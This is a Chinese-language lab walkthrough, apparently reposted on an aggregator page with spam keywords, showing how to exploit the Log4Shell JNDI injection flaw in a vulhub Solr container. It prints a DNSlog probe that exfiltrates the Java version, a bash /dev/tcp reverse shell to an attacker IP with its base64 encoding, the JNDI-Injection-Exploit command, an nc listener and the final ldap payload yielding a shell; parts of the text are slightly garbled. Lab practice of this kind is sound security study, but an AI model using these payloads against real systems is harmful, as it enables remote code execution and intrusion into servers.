设计教程网站推荐湖南网络推广排名
news/
2025/9/29 9:55:05/
文章来源:
设计教程网站推荐,湖南网络推广排名,这么联系做网站推广,荆州公司网站建设所用环境
宝塔云服务器 log4j2 是Apache的⼀个java日志框架#xff0c;我们借助它进行日志相关操作管理#xff0c;然而在2021年末log4j2爆出了远程代码执行漏洞#xff0c;属于严重等级的漏洞。
apache log4j通过定义每⼀条日志信息的级别能够更加细致地控制日志⽣成地过…所用环境
宝塔云服务器 log4j2 是Apache的⼀个java日志框架我们借助它进行日志相关操作管理然而在2021年末log4j2爆出了远程代码执行漏洞属于严重等级的漏洞。
apache log4j通过定义每⼀条日志信息的级别能够更加细致地控制日志⽣成地过程受影响地版本中纯在JNDI注入漏洞导致日志在记录用户输入地数据时触发了注入漏洞该漏洞可导致远程代码执行且利用条件低影响范围广小到网站大到可联网的车都受影响建议使用了相关版本的应用或者插件尽快升级修补做好相关方措施避免造成不必要的损失。
一、启动靶场容器并在浏览器中进行访问
#启动命令
cd vulhub/log4j/CVE-2021-44228
docker-compose up -d
docker ps 这里看到我们的容器端口为8983在浏览器中访问该地址 这里我们访问成功
二、用dnslog测试注入效果
访问dnslog.cn获取一个新的链接 可以发现 /solr/admin/cores?action 这里有个参数可以传可以按照上面的原理 先构造⼀个请求传过去存在JNDI注入那么ldap服务端会执行我们传上去的payload然后在DNSLOG 平台上那里留下记录我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的版本号!
/solr/admin/cores?action${jndi:ldap://${sys:java.version}.0ww7ad.dnslog.cn} 刷新一下便看到了java的版本号
三、开始反弹Shell
# JDNI项⽬地址
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0# 反弹shell
bash -i /dev/tcp/172.16.1.159/6666 01# 反弹Shell-base64加密
YmFzaCAtaSAJiAvZGV2L3RjcC8xNzIuMTYuMS4xNTkvNjY2NiAwPiYx# 命令模板
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c{echo,[经过base64编码后的命令]}|{base64,-d}|bash -A [你的vpsip]# 最终Payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xNzIuMTYuMS4xODYvNjk2OSAwPiYx}|{base64,-d}|{bash,-i} -A 172.16.1.186# 备注
-C后⾯的参数是要执⾏的命令以及编码⽅式-A后⾯就是对应ip地址。 这里已经生成了我们的恶意代码类
我们再打开一个终端来监听我们的6666端口
nc -lvvp 6666
拿取JDK1.8并构造Payload且直接访问..可以看到网页被重定向到了我们的恶意类网址...
/solr/admin/cores?action${jndi:ldap://101.42.118.221:1389/jyvecl} 此时我们就获取了该网站的shell我们输入ls来看看命令是否被执行 拿下
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/921656.shtml
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!